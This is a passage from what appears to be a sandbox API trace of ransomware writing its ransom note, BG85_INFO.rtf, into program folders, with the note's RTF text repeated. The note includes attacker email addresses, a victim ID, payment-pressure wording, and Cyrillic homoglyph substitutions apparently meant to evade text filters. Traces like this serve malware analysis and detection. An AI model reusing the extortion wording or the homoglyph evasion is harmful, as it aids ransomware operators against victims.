Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x1e971a8, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0071.071] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e971a8*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x1e971a8*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0071.073] CloseHandle (hObject=0x1ec) returned 1 [0071.073] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\bg85_info.rtf")) returned 0xffffffff [0071.073] GetLastError () returned 0x2 [0071.073] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Legal\\EUQ\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\legal\\euq\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.074] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 